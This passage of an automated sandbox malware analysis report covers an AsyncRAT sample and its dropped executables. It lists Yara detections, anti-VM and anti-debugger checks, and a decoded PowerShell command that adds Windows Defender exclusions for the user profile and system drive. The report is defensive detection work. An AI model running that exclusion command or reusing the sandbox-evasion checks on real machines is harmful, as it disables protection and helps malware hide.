Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR

Yara detected AsyncRAT

Source: Yara match	File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.36bbf70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.33f31b0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.3709a7c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Lxfrfbi.exe.3c35eec.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Lxfrfbi.exe.3c7cd6c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.33ac330.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Vulvvmkewji.exe.3709a7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Lxfrfbi.exe.33f31b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Vulvvmkewji.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Lxfrfbi.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 8084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Lxfrfbi.exe PID: 8140, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL@\^Q
Source: Vulvvmkewji.exe, 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: EXPLORER9SBIEDLL.DLL:SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE;VERSION<SERIALNUMBER>VMWARE\|VIRTUAL\|A M I\|XEN?SELECT * FROM WIN32_COMPUTERSYSTEM@MANUFACTURERAMODELBMICROSOFT\|VMWARE\|VIRTUALCJOHNDANNAEXXXXXXXX

Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Memory allocated: 3080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Memory allocated: 3250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Memory allocated: 5250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Memory allocated: 6500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Memory allocated: 7500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Memory allocated: 86B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Memory allocated: 96B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Memory allocated: 6770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Memory allocated: 68F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Memory allocated: 88F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Memory allocated: 14F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Memory allocated: 2F40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Memory allocated: 2E70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Memory allocated: 60B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Memory allocated: 70B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Memory allocated: 8300000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Memory allocated: 9300000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Memory allocated: 6E40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Memory allocated: 70E0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Memory allocated: 6E40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Memory allocated: 1A10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Memory allocated: 37D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Memory allocated: 1E00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Memory allocated: 6970000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Memory allocated: 7970000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Memory allocated: 8B30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Memory allocated: 9B30000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Memory allocated: 5260000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Memory allocated: 7030000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Memory allocated: 6E50000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4251	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 768	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Window / User API: threadDelayed 9995	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Window / User API: foregroundWindowGot 922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe	Window / User API: foregroundWindowGot 856	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3219	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2823	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Window / User API: threadDelayed 6176	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Window / User API: threadDelayed 3379	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7308	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7272	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe TID: 7324	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656	Thread sleep count: 3219 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656	Thread sleep count: 2823 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7836	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7892	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7892	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7900	Thread sleep count: 6176 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7900	Thread sleep count: 3379 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe TID: 7964	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 8104	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe TID: 8164	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7428	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: Yara match	File source: 4.0.Office Installer.exe.7ff6c80ea6da.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Gm602axA2d.exe.4ba1cfa.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Office Installer.exe.7ff6c80ea6da.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Office Installer.exe.7ff6c80ea6da.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Office Installer.exe.7ff6c80ea6da.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Office Installer.exe.7ff6c7e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Office Installer.exe.7ff6c7e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Gm602axA2d.exe PID: 7136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Office Installer.exe PID: 7336, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Office Installer.exe, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477

Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware\V
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual@\^q
Source: Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	Binary or memory string: VMware, Inc.1>0<
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: explorer9SbieDll.dll:select * from Win32_BIOS8Unexpected WMI query failure;version<SerialNumber>VMware\|VIRTUAL\|A M I\|Xen?select * from Win32_ComputerSystem@manufacturerAmodelBMicrosoft\|VMWare\|VirtualCjohnDannaExxxxxxxx
Source: Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareLR^qhf7
Source: Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	Binary or memory string: http://www.vmware.com/0
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GOA8B XBTW58A4OC@\^q0VMware\|VIRTUAL\|A M I\|Xen
Source: AppLaunch.exe, 0000000A.00000002.2944600925.0000000008ED8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW&"
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: mwlhZ mnyYT9VTA cbCLrcnk@\^q0Microsoft\|VMWare\|Virtual
Source: Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareLR^q
Source: Lxfrfbi.exe, 0000000C.00000002.1931713295.000000000336C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen@\^q
Source: powershell.exe, 00000008.00000002.2322745566.000002B46D71C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2944600925.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000A.00000002.2944600925.0000000008ED8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWareLR^q
Source: Office Installer.exe, 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp	Binary or memory string: VMware, Inc.0
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareLR^q$
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q 1:en-CH:Microsoft\|VMWare\|Virtual
Source: Vulvvmkewji.exe, 00000003.00000002.1722917882.000000000367C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q 1:en-CH:VMware\|VIRTUAL\|A M I\|Xen`
Source: Office Installer.exe, 00000004.00000002.2914496765.0000025350A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Lxfrfbi.exe, 00000010.00000002.2101694396.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q 1:en-CH:VMware\|VIRTUAL\|A M I\|Xen

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Lxfrfbi.exe	Process queried: DebugPort

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Gm602axA2d.exe

Code function: 0_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,

0_2_004014D1

Source: C:\Users\user\AppData\Local\Vulvvmkewji.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\Gm602axA2d.exe	Process created: Base64 decoded <#avz#>Add-MpPreference <#btd#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#jqq#> -Force <#zsj#>
Source: C:\Users\user\Desktop\Gm602axA2d.exe	Process created: Base64 decoded <#avz#>Add-MpPreference <#btd#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#jqq#> -Force <#zsj#>			Jump to behavior

Source: C:\Users\user\Desktop\Gm602axA2d.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA="	Jump to behavior
